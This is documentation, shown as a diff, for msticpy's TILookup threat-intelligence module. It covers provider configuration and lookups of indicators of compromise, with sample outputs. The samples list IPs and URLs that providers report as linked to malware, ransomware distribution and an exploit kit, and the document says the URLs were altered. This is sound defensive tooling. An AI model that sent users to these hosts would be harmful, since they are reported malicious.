+.. tip:: If you are missing a required parameter for a provider, TILookup
+   will throw an exception. You can use the `TILookup(providers=["prov",...])`
+   parameter to load only specific providers.
+
+Configuration File
+------------------
+
+You **must** have a correctly configured
+:doc:`msticpyconfig.yaml <../getting_started/msticpyconfig>` in
+order to use the TILookup module. In this file you specify the
+providers you want to load, any API keys that the provider services
+require. You can configure primary and secondary providers.
+
+Primary providers are those used by default, when you query for IoCs
+without specifying any specific provider names. You may want to
+add some providers as secondary so that they are not used for every
+query but are available if you want to search more widely.
+
+You will usually need to supply an authorization (API) key and in some cases a
+user ID for each provider.
+
+
+.. note:: For LogAnalytics/Azure Sentinel providers, you will need the workspace
+  ID and tenant ID and will need to authenticate in order to access the
+  data (although if you have an existing authenticated connection with the
+  same workspace/tenant, this connection will be re-used).
+
+The configuration file is read from the current directory.
+
+Alternatively, you can specify a location for this file in an
+environment variable ``MSTICPYCONFIG``.
+
+If you need to create a config file, use the content shown below.
+The ``Provider`` key must correspond to an available Python class.
+The names of the built-in provider classes can be obtained using the
+:py:meth:`list_available_providers <msticpy.sectools.tilookup.TILookup.list_available_providers>`
+function.
+
+Delete any provider entries from the example below that you do not want
+to use and add the missing parameters for your providers.
+Save the file as ``msticpyconfig.yaml`` or insert the TIProviders
+section into your existing msticpyconfig.yaml
+
+
+.. code:: yaml
+
+    QueryDefinitions:
+
+    TIProviders:
+      OTX:
+        Args:
+          AuthKey: "your-otx-key"
+        Primary: True
+        Provider: "OTX" # Explicitly name provider to override
+      VirusTotal:
+        Args:
+          AuthKey: "your-vt-key"
+        Primary: True
+        Provider: "VirusTotal"
+      XForce:
+        Args:
+          ApiID: "your-xforce-id"
+          AuthKey: "your-xforce-key"
+        Primary: True
+        Provider: "XForce"
+      GreyNoise:
+        Args:
+          AuthKey: ""
+        Primary: true
+        Provider: GreyNoise
+      AzureSentinel:
+        # Note if you do not specify any settings in the Args key for the AzureSentinel
+        # provider, it will default to using your default Azure Sentinel workspace.
+        Args:
+          WorkspaceID: "your-azure-sentinel-workspace-id"
+          TenantID: "your-azure-sentinel-tenant-id"
+        Primary: True
+        Provider: "AzSTI"
+
+.. note:: If you have your Azure Sentinel workspace and tenant IDs configured
+  either in a config.json file or in the `AzureSentinel` configuration section
+  of the `msticpyconfig.yaml` you do not need to set these values for the
+  provider here. They will be inherited from the global configuration.
+  If you want to use a different workspace for your TI lookups then specify
+  the workspace and tenant IDs here. The tenant ID must be the same as
+  in both cases though: the Kqlmagic data query library does not support
+  access workspaces in multiple tenants from the same notebook.
+
+
+You can also specify that the Args values as environment
+variables as follows:
+
+
+.. code:: yaml
+
+      XForce:
+          Args:
+            ApiID:
+              EnvironmentVar: "XFORCE_ID"
+            AuthKey:
+              EnvironmentVar: "XFORCE_KEY"
+          Primary: False
+          Provider: "XForce"
+
+
+.. note:: You can also use Key Vault storage with optional local
+   caching of the secrets using *keyring*. See
+   :doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+   for more details.
+
+When you have made a configuration change you can reload the
+providers and check the status like this.
+
+
+.. code:: ipython3
+
+    ti_lookup.reload_providers()
+    ti_lookup.provider_status
+
+
+.. parsed-literal::
+
+    ['OTX - AlientVault OTX Lookup. (primary)',
+     'VirusTotal - VirusTotal Lookup. (primary)',
+     'XForce - IBM XForce Lookup. (primary)',
+     'AzSTI - Azure Sentinel TI provider class. (primary)']
+
+
+.. tip:: If you are missing a required parameter for a provider, TILookup
+   will throw an exception. You can use the `providers` parameter to
+   `TILookup`
+
+   `TILookup(providers=["prov",...])`
+
+   to specify which providers to load and avoid loading any that
+   causing problems.
+
+   The `providers` parameter to TILookup affects which providers are
+   *loaded*. When you are querying TI (using `lookup_ioc` or `lookup_iocs`)
+   you can also specify a list of providers to use for the query. In the
+   second case the `providers` list selects which of the loaded providers
+   to send queries to. It does not cause additional providers to load.
+
+
+Looking up IoCs
+---------------
+
+lookup_ioc
+~~~~~~~~~~
+
+See :py:meth:`lookup_ioc<msticpy.sectools.tilookup.TILookup.lookup_ioc>`
+
+To lookup a single IoC.
+
+::
+
+   ti_lookup.lookup_ioc(
+       observable: str = None,
+       ioc_type: str = None,
+       ioc_query_type: str = None,
+       providers: List[str] = None,
+       prov_scope: str = 'primary',
+       **kwargs,
+   ) -> Tuple[bool, List[Tuple[str, msticpy.sectools.tiproviders.ti_provider_base.LookupResult]]]
+
+   Lookup single IoC in active providers.
+
+   Parameters
+   ----------
+   observable : str
+       IoC observable
+       (`ioc` is also an alias for observable)
+   ioc_type : str, optional
+       One of IoCExtract.IoCType, by default None
+       If none, the IoC type will be inferred
+   ioc_query_type: str, optional
+       The ioc query type (e.g. rep, info, malware)
+   providers: List[str]
+       Explicit list of providers to use
+   prov_scope : str, optional
+       Use primary, secondary or all providers, by default "primary"
+   kwargs :
+       Additional arguments passed to the underlying provider(s)
+
+   Returns
+   -------
+   Tuple[bool, List[Tuple[str, LookupResult]]]
+       The result returned as a tuple(bool, list):
+       bool indicates whether a TI record was found in any provider
+       list has an entry for each provider result
+
+
+Lookup an IoC from a single provider
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+And show the output
+
+.. code:: ipython3
+
+    result, details = ti_lookup.lookup_ioc(observable="38.75.137.9", providers=["OTX"])
+
+    print("Positive" if result else "Negative")
+    # the details is a list (since there could be multiple responses for an IoC)
+    for provider, detail in details:
+        print(provider)
+        detail.summary
+        print("\nRaw Results")
+        detail.raw_result_fmt
+
+
+
+.. parsed-literal::
+
+    Positive
+    OTX
+    ioc: 38.75.137.9 ( ipv4 )
+    result: True
+    {   'names': ['Underminer EK'],
+        'pulse_count': 1,
+        'references': [   [   'https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/']],
+        'tags': [[]]}
+    reference:  https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/general
+
+    Raw Results
+    { 'area_code': 0,
+      'asn': 'AS63023 GTHost',
+      'base_indicator': { 'access_reason': '',
+                          'access_type': 'public',
+                          'content': '',
+                          'description': '',
+                          'id': 2127020821,
+                          'indicator': '38.75.137.9',
+                          'title': '',
+                          'type': 'IPv4'},
+      'charset': 0,
+      'city': 'Los Angeles',
+      'city_data': True,
+      'continent_code': 'NA',
+      'country_code': 'US',
+      'country_code3': 'USA',
+      'country_name': 'United States',
+      'dma_code': 803,
+      'flag_title': 'United States',
+      'flag_url': '/assets/images/flags/us.png',
+      'indicator': '38.75.137.9',
+      'latitude': 34.0584,
+      'longitude': -118.278,
+      'postal_code': '90017',
+      'pulse_info': { 'count': 1,
+                      'pulses': [ { 'TLP': 'white',
+                                    'adversary': '',
+                                    'attack_ids': [],
+                                    'author': { 'avatar_url': 'https://otx.alienvault.com/assets/images/default-avatar.png',
+                                                'id': '79520',
+                                                'is_following': False,
+                                                'is_subscribed': False,
+                                                'username': 'mattvittitoe'},
+                                    'cloned_from': None,
+                                    'comment_count': 0,
+                                    'created': '2019-07-31T18:01:29.744000',
+                                    'description': '',
+                                    'downvotes_count': 0,
+                                    'export_count': 0,
+                                    'follower_count': 0,
+                                    'groups': [ { 'id': 614,
+                                                  'name': 'DCT Security Team'}],
+                                    'id': '5d41d77901a2f8c6e9b650e9',
+                                    'in_group': True,
+                                    'indicator_count': 24,
+                                    'indicator_type_counts': { 'FileHash-MD5': 5,
+                                                               'IPv4': 3,
+                                                               'URL': 16},
+                                    'industries': [],
+                                    'is_author': False,
+                                    'is_modified': False,
+                                    'is_subscribing': None,
+                                    'locked': 0,
+                                    'malware_families': [],
+                                    'modified': '2019-07-31T18:01:29.744000',
+                                    'modified_text': '19 days ago ',
+                                    'name': 'Underminer EK',
+                                    'public': 1,
+                                    'pulse_source': 'web',
+                                    'references': [ 'https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/'],
+                                    'subscriber_count': 10,
+                                    'tags': [],
+                                    'targeted_countries': [],
+                                    'threat_hunter_scannable': True,
+                                    'upvotes_count': 0,
+                                    'validator_count': 0,
+                                    'vote': 0,
+                                    'votes_count': 0}],
+                      'references': [ 'https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/']},
+      'region': 'CA',
+      'reputation': 0,
+      'sections': [ 'general',
+                    'geo',
+                    'reputation',
+                    'url_list',
+                    'passive_dns',
+                    'malware',
+                    'nids_list',
+                    'httpscans'],
+      'type': 'IPv4',
+      'type_title': 'IPv4',
+      'whois': 'http://whois.domaintools.com/38.75.137.9'}
+
+|
+
+Or convert result to a DataFrame and let pandas do the display work
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+See :py:meth:`result_to_df<msticpy.sectools.tilookup.TILookup.result_to_df>`
+
+.. code:: ipython3
+
+    result = ti_lookup.lookup_ioc(observable="38.75.137.9", providers=["OTX"])
+    ti_lookup.result_to_df(result).T
+
+
++---------------+------------------------------------------------------------------------------------------------------+
+|               | OTX                                                                                                  |
++---------------+------------------------------------------------------------------------------------------------------+
+| IoC           | 38.75.137.9                                                                                          |
++---------------+------------------------------------------------------------------------------------------------------+
+| IoCType       | ipv4                                                                                                 |
++---------------+------------------------------------------------------------------------------------------------------+
+| QuerySubtype  | None                                                                                                 |
++---------------+------------------------------------------------------------------------------------------------------+
+| Result        | True                                                                                                 |
++---------------+------------------------------------------------------------------------------------------------------+
+| Details       | {'pulse_count': 1, 'names': ['Underminer EK'], 'tags': [[]], 'references': [['\https://blog.malw...  |
++---------------+------------------------------------------------------------------------------------------------------+
+| RawResult     | {'sections': ['general', 'geo', 'reputation', 'url_list', 'passive_dns', 'malware', 'nids_list',...  |
++---------------+------------------------------------------------------------------------------------------------------+
+| Reference     | \https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/general                               |
++---------------+------------------------------------------------------------------------------------------------------+
+| Status        | 200                                                                                                  |
++---------------+------------------------------------------------------------------------------------------------------+
+
+|
+
+.. code:: ipython3
+
+    # Extract a single field (RawResult) from the dataframe (.iloc[0] is to select the row)
+    ti_lookup.result_to_df(result)["RawResult"].iloc[0]
+
+
+
+
+.. parsed-literal::
+
+    {'sections': ['general',
+      'geo',
+      'reputation',
+      'url_list',
+      'passive_dns',
+      'malware',
+      'nids_list',
+      'httpscans'],
+     'city': 'Los Angeles',
+     'area_code': 0,
+     'pulse_info': {'count': 1,
+      'references': ['https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/'],
+      'pulses': [{'indicator_type_counts': {'URL': 16,
+         'FileHash-MD5': 5,
+         'IPv4': 3},
+        'pulse_source': 'web',
+        'TLP': 'white',
+        'description': '',
+        ...
+
+
+
+Lookup using all primary providers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    result = ti_lookup.lookup_ioc(observable="38.75.137.9")
+    ti_lookup.result_to_df(result)
+
++-------------+--------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------+---------+
+|             | IoC          | IoCType  | QuerySubtype  | Result  | Details                                                                                              | RawResult                                                                                            | Reference                                                              | Status  |
++=============+==============+==========+===============+=========+======================================================================================================+======================================================================================================+========================================================================+=========+
+| OTX         | 38.75.137.9  | ipv4     | None          | True    | {'pulse_count': 1, 'names': ['Underminer EK'], 'tags': [[]], 'references': [['\https://blog.malw...  | {'sections': ['general', 'geo', 'reputation', 'url_list', 'passive_dns', 'malware', 'nids_list',...  | \https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/general | 200     |
++-------------+--------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------+---------+
+| VirusTotal  | 38.75.137.9  | ipv4     | None          | True    | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': ['\http://38.75.13...  | {'asn': 63023, 'undetected_urls': [['\http://38.75.137.9:9088/', '3d5edb0e0bb726e414a9b76dac619c...  | \https://www.virustotal.com/vtapi/v2/ip-address/report                 | 200     |
++-------------+--------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------+---------+
+| XForce      | 38.75.137.9  | ipv4     | None          | True    | {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...  | {'ip': '38.75.137.9', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional In...  | \https://api.xforce.ibmcloud.com/ipr/38.75.137.9                       | 200     |
++-------------+--------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------+---------+
+| AzSTI       | 38.75.137.9  | ipv4     | None          | False   | 0 rows returned.                                                                                     | None                                                                                                 | None                                                                   | -1      |
++-------------+--------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------+---------+
+| GreyNoise   | 38.75.137.9  | ipv4     | None          | False   | Not found.                                                                                           | <Response [404]>                                                                                     | https://api.greynoise.io/v3/community/38.75.137.9                      | 404     |
++-------------+--------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------+---------+
+
+
+
+Provider Usage
+--------------
+
+This shows the supported IoC Types.
+
+In some cases an IoC type will also support special types of sub-query
+such as geo-ip and passive-dns
+
+See :py:meth:`provider_usage<msticpy.sectools.tilookup.TILookup.provider_usage>`
+
+.. code:: ipython3
+
+    ti_lookup.provider_usage()
+
+
+.. parsed-literal::
+
+    Primary providers
+    -----------------
+
+    Provider class: OTX
+    AlientVault OTX Lookup. Supported query types:
+      ioc_type=dns
+      ioc_type=dns, ioc_query_type=geo
+      ioc_type=dns, ioc_query_type=passivedns
+      ioc_type=file_hash
+      ioc_type=hostname
+      ioc_type=ipv4
+      ioc_type=ipv4, ioc_query_type=geo
+      ioc_type=ipv4, ioc_query_type=passivedns
+      ioc_type=ipv6
+      ioc_type=ipv6, ioc_query_type=geo
+      ioc_type=ipv6, ioc_query_type=passivedns
+      ioc_type=md5_hash
+      ioc_type=sha1_hash
+      ioc_type=sha256_hash
+      ioc_type=url
+
+    Provider class: VirusTotal
+    VirusTotal Lookup. Supported query types:
+      ioc_type=dns
+      ioc_type=file_hash
+      ioc_type=ipv4
+      ioc_type=md5_hash
+      ioc_type=sha1_hash
+      ioc_type=sha256_hash
+      ioc_type=url
+
+    Provider class: XForce
+    IBM XForce Lookup. Supported query types:
+      ioc_type=dns, ioc_query_type=info
+      ioc_type=dns, ioc_query_type=passivedns
+      ioc_type=dns, ioc_query_type=whois
+      ioc_type=file_hash
+      ioc_type=hostname, ioc_query_type=whois
+      ioc_type=ipv4
+      ioc_type=ipv4, ioc_query_type=malware
+      ioc_type=ipv4, ioc_query_type=passivedns
+      ioc_type=ipv4, ioc_query_type=rep
+      ioc_type=ipv4, ioc_query_type=whois
+      ioc_type=ipv6
+      ioc_type=ipv6, ioc_query_type=malware
+      ioc_type=ipv6, ioc_query_type=passivedns
+      ioc_type=ipv6, ioc_query_type=rep
+      ioc_type=ipv6, ioc_query_type=whois
+      ioc_type=md5_hash
+      ioc_type=sha1_hash
+      ioc_type=sha256_hash
+      ioc_type=url
+      ioc_type=url, ioc_query_type=malware
+
+    Provider class: AzSTI
+    Azure Sentinel TI provider class. Supported query types:
+      ioc_type=dns
+      ioc_type=file_hash
+      ioc_type=hostname
+      ioc_type=ipv4
+      ioc_type=ipv6
+      ioc_type=linux_path
+      ioc_type=md5_hash
+      ioc_type=sha1_hash
+      ioc_type=sha256_hash
+      ioc_type=url
+      ioc_type=windows_path
+
+    Provider class: GreyNoise
+    GreyNoise Lookup. Supported query types:
+	  ioc_type=ipv4
+	  ioc_type=ipv4, ioc_query_type=full
+	  ioc_type=ipv4, ioc_query_type=quick
+
+    Secondary providers
+    -------------------
+    none
+
+
+Use to do a passive DNS lookup
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    result = ti_lookup.lookup_ioc(observable="38.75.137.9", ico_type="ipv4", ioc_query_type="passivedns", providers=["XForce"])
+    result
+
+
+
+
+.. parsed-literal::
+
+    (True,
+     [('XForce',
+       LookupResult(ioc='38.75.137.9', ioc_type='ipv4', query_subtype='passivedns', result=True, details={'records': 1}, raw_result={'Passive': {'query': '0x00000000000000000000ffff264b8909', 'records': []}, 'RDNS': ['9-137-75-38.clients.gthost.com'], 'total_rows': 1}, reference='\https://api.xforce.ibmcloud.com/resolve/38.75.137.9', status=200))])
+
+
+
+Inferring IoC type vs specifying explicitly
+--------------------------------------------
+
+If you do a lookup without specifying a type, TILookup will try to infer
+the type by matching regexes. There are patterns for all supported types
+but there are some caveats:
+
+-  The match is not 100% foolproof - e.g. some URLs and hash types may
+   be misidentified.
+-  The inference adds an overhead to each lookup.
+
+If you know the type that you want to look up, it is always better to
+explicitly include it. - For single IoC lookup, use the ``ioc_type``
+parameter. - For multiple IoC lookups (see below), supply either: - a
+DataFrame with a column that specifies the type for each entry - a
+dictionary of the form ``{ioc_observable: ioc_type}``
+
+Looking up Multiple IoCs
+------------------------
+
+See :py:meth:`lookup_iocs<msticpy.sectools.tilookup.TILookup.lookup_iocs>`
+
+lookup_iocs
+~~~~~~~~~~~
+
+::
+
+   Signature:
+   ti_lookup.lookup_iocs(
+       data: Union[pandas.core.frame.DataFrame, Mapping[str, str], Iterable[str]],
+       obs_col: str = None,
+       ioc_type_col: str = None,
+       ioc_query_type: str = None,
+       providers: List[str] = None,
+       prov_scope: str = 'primary',
+       **kwargs,
+   ) -> pandas.core.frame.DataFrame
+
+   Lookup a collection of IoCs.
+
+   Parameters
+   ----------
+   data : Union[pd.DataFrame, Mapping[str, str], Iterable[str]]
+       Data input in one of three formats:
+       1. Pandas dataframe (you must supply the column name in
+       `obs_col` parameter)
+       2. Mapping (e.g. a dict) of [observable, IoCType]
+       3. Iterable of observables - IoCTypes will be inferred
+   obs_col : str, optional
+       DataFrame column to use for observables, by default None
+   ioc_type_col : str, optional
+       DataFrame column to use for IoCTypes, by default None
+   ioc_query_type: str, optional
+       The ioc query type (e.g. rep, info, malware)
+   providers: List[str]
+       Explicit list of providers to use
+   prov_scope : str, optional
+       Use primary, secondary or all providers, by default "primary"
+   kwargs :
+       Additional arguments passed to the underlying provider(s)
+
+   Returns
+   -------
+   pd.DataFrame
+       DataFrame of results
+
+.. code:: ipython3
+
+    # View the docstring (as above)
+    ti_lookup.lookup_iocs?
+
+.. code:: ipython3
+
+    ioc_ips = [
+        "185.92.220.35",
+        "213.159.214.86",
+        "77.222.54.202",
+        "91.219.29.81",
+        "193.9.28.254",
+        "89.108.83.196",
+        "91.219.28.44",
+        "188.127.231.124",
+        "192.42.116.41",
+        "91.219.31.18",
+        "46.4.239.76",
+        "188.166.168.250",
+        "195.154.241.208",
+        "51.255.172.55",
+        "93.170.169.52",
+        "104.215.148.63",
+        "13.77.161.179",
+        "40.76.4.15",
+        "40.112.72.205",
+        "40.113.200.201",
+    ]
+
+    ti_lookup.lookup_iocs(data=ioc_ips, providers="AzSTI")
+
+
++---+-----------------+----------+---------------+----------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+|   | IoC             | IoCType  | QuerySubtype  | Reference                              | Result  | Status  | Details                                                                                              | RawResult                                                                                            | Provider  |
++===+=================+==========+===============+========================================+=========+=========+======================================================================================================+======================================================================================================+===========+
+| 0 | 213.159.214.86  | ipv4     | None          | ThreatIntelligenceIndicator  | whe...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': '0164ADB4A6CB7A79FBAE7BE90A43050B090A18364E3855048AC86B9DA5E0A92B', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+----------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 1 | 40.113.200.201  | ipv4     | None          | ThreatIntelligenceIndicator  | whe...  | False   | -1.0    | 0 rows returned.                                                                                     | NaN                                                                                                  | AzSTI     |
++---+-----------------+----------+---------------+----------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 2 | 91.219.29.81    | ipv4     | None          | ThreatIntelligenceIndicator  | whe...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': '3F458D91A21866C9037B99D997379A6906573766C0C2F8FB45327A6A15676A0D', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+----------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 3 | 89.108.83.196   | ipv4     | None          | ThreatIntelligenceIndicator  | whe...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': 'C3CA82D5B30A34F4BD6188C9DCFAD9E46D3C0CC45CC4FD969DA3A398DC34B1AE', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+----------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 4 | 192.42.116.41   | ipv4     | None          | ThreatIntelligenceIndicator  | whe...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': '2F321C9D2593B6EF59DEB64B6CB209F375529C429F0DF463D639784E7353AA5D', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+----------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+
+
+
+Multiple IoCs using all providers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Output sorted by IoC
+
+.. code:: ipython3
+
+    ioc_urls = [
+        "http://cheapshirts.us/zVnMrG.php",
+        "http://chinasymbolic.com/i9jnrc",
+        "http://cetidawabi.com/468fd",
+        "http://append.pl/srh9xsz",
+        "http://aiccard.co.th/dvja1te",
+        "http://ajaraheritage.ge/g7cberv",
+        "http://cic-integration.com/hjy93JNBasdas",
+        "https://google.com",  # benign
+        "https://microsoft.com",  # benign
+        "https://python.org",  # benign
+    ]
+    results = ti_lookup.lookup_iocs(data=ioc_urls)
+    results.sort_values("IoC")
+
++---+----------------------------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------+-------------+---------+
+|   | IoC                              | IoCType  | QuerySubtype  | Result  | Details                                                                                              | RawResult                                                                                            | Reference                                                                                           | Provider    | Status  |
++===+==================================+==========+===============+=========+======================================================================================================+======================================================================================================+=====================================================================================================+=============+=========+
+| 0 | \http://aiccard.co.th/dvja1te    | url      | None          | True    | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': 'FAE39C007D6554822504A1E0BDFD788E27DDC748ED63B258651DE52E4FA6D511', 'TimeGenerat...  | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-07-21T17:30:41.900764Z) | w...  | AzSTI       | 0.0     |
++---+----------------------------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------+-------------+---------+
+| 4 | \http://aiccard.co.th/dvja1te    | url      | None          | True    | {'cats': None, 'categoryDescriptions': None}                                                         | {'result': {'url': 'aiccard.co.th', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, 'ass...  | \https://api.xforce.ibmcloud.com/url/\http://aiccard.co.th/dvja1te                                  | XForce      | NaN     |
++---+----------------------------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------+-------------+---------+
+| 4 | \http://aiccard.co.th/dvja1te    | url      | None          | True    | {'pulse_count': 3, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...  | {'indicator': '\http://aiccard.co.th/dvja1te', 'alexa': '\http://www.alexa.com/siteinfo/aiccard.c... | \https://otx.alienvault.com/api/v1/indicators/url/\http://aiccard.co.th/dvja1te/general             | OTX         | NaN     |
++---+----------------------------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------+-------------+---------+
+| 4 | \http://aiccard.co.th/dvja1te    | url      | None          | False   | No response from provider.                                                                           | <Response [403]>                                                                                     | \https://www.virustotal.com/vtapi/v2/url/report                                                     | VirusTotal  | NaN     |
++---+----------------------------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------+-------------+---------+
+| 5 | \http://ajaraheritage.ge/g7cberv | url      | None          | True    | {'cats': None, 'categoryDescriptions': None}                                                         | {'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...  | \https://api.xforce.ibmcloud.com/url/\http://ajaraheritage.ge/g7cberv                               | XForce      | NaN     |
++---+----------------------------------+----------+---------------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------+-------------+---------+
+
+.. note:: the URLs in the previous example have been altered to prevent
+   inadvertent navigation to them.
+
+
+Browsing and Selecting TI Results
+---------------------------------
+To make it easier to walk through the returned results msticpy has a browser.
+This shows you the TI results aggregated by the IoC value (e.g. an individual IP
+Address or URL) for all providers.
+
+For each provider that returns a result for an IoC, the summarized details
+will be shown in a table below the browse list.
+
+Click on ``Raw results from provider...`` to see all returned data.
+
+.. note:: the reference URL may not work if you have not authenticated
+   to the TI service.
+
+.. figure:: _static/TIBrowser.png
+   :alt: Threat Intel results browser
+   :width: 5.23000in
+
+The value of the selected IoC entry is available as `ti_selector.value`.
+You can match this back to the original results DataFrame as follows:
+
+.. code:: IPython
+
+    results[results["Ioc"] == ti_selector.value[0]]
+
+
+
+Specifying Time Ranges
+----------------------
+
+Some providers (currently only AzSTI) support time ranges
+so that you can specify specific periods to search for.
+
+If a provider does not support time ranges, the parameters will be
+ignored
+
+.. code:: ipython3
+
+    from datetime import datetime
+    search_origin = datetime(2019, 8, 5)
+    q_times = nbwidgets.QueryTime(units="hour", auto_display=True, origin_time=search_origin, max_after=24, max_before=24)
+
+    # Using this data range returned no results
+    ti_lookup.lookup_iocs(data=ioc_ips, providers="AzSTI", start=q_times.start, end=q_times.end).head()
+
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+-------------------+---------+-----------+
+|   | IoC             | IoCType  | QuerySubtype  | Reference                                                                                           | Result  | Details           | Status  | Provider  |
++===+=================+==========+===============+=====================================================================================================+=========+===================+=========+===========+
+| 0 | 213.159.214.86  | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-08-04T00:00:00Z) | where Ti...  | False   | 0 rows returned.  | -1      | AzSTI     |
+| 1 | 40.113.200.201  | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-08-04T00:00:00Z) | where Ti...  | False   | 0 rows returned.  | -1      | AzSTI     |
+| 2 | 91.219.29.81    | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-08-04T00:00:00Z) | where Ti...  | False   | 0 rows returned.  | -1      | AzSTI     |
+| 3 | 89.108.83.196   | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-08-04T00:00:00Z) | where Ti...  | False   | 0 rows returned.  | -1      | AzSTI     |
+| 4 | 192.42.116.41   | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-08-04T00:00:00Z) | where Ti...  | False   | 0 rows returned.  | -1      | AzSTI     |
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+-------------------+---------+-----------+
+
+
+.. code:: ipython3
+
+    from datetime import datetime
+    search_origin = datetime(2019, 8, 5)
+    q_times = nbwidgets.QueryTime(units="day", auto_display=True, origin_time=search_origin, max_after=24, max_before=24)
+
+    # Using a wider ranges produces results
+    ti_lookup.lookup_iocs(data=ioc_ips, providers="AzSTI", start=q_times.start, end=q_times.end)
+
+
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+|   | IoC             | IoCType  | QuerySubtype  | Reference                                                                                           | Result  | Status  | Details                                                                                              | RawResult                                                                                            | Provider  |
++===+=================+==========+===============+=====================================================================================================+=========+=========+======================================================================================================+======================================================================================================+===========+
+| 0 | 213.159.214.86  | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-07-12T00:00:00Z) | where Ti...  | True    | 0.0     | {'Action': 'alert', 'ThreatType': 'Malware', 'ThreatSeverity': nan, 'Active': True, 'Description...  | {'IndicatorId': '0164ADB4A6CB7A79FBAE7BE90A43050B090A18364E3855048AC86B9DA5E0A92B', 'TimeGenerat...  | AzSTI     |
++---+-----------------+----------+---------------+-----------------------------------------------------------------------------------------------------+---------+---------+------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+-----------+
+| 1 | 40.113.200.201  | ipv4     | None          | ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2019-07-12T00:00:00Z) | where Ti...  | False   | -1.0    | 0 rows returned.                                                                                     | NaN                                                                                                  | AzSTI     |
